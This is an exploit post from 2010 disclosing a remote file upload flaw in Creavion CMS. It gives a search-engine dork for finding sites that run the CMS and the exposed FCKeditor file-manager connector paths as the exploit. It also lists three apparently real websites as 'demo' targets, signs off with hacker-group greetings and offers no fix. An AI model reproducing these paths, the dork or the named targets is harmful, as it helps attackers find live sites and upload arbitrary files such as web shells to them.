Creavion CMS Remote File Upload Vulnerability

2010-10-02 12:14:30
Inviato da: Net.Edit0r

======================================================
Creavion CMS Remote File Upload Vulnerability
======================================================

###########################

Author: Net.Edit0r

Email : [email protected] & [email protected]

Script: Creavion CMS [ Http://creavion.com ]

Dork : "powered by creavion cms"

Platform :linux/php

###########################

[ Vulnerable File ]

1. [ admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html ]

2. [ admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php ]

[ XpL ]

http://Target/[path]/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html


http://Target/[path]/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

OR

http://Target/File Name !


[ Demo]

http://www.visioevents.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html

http://creavion.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html

http://www.sembdner-gitarren.de/admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html


########################################### Iranian HackerZ ##############################################
#
#
# Spical Thanks To : Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic ~ AmIr-MaGic
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net #Ibh
#
##########################################################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.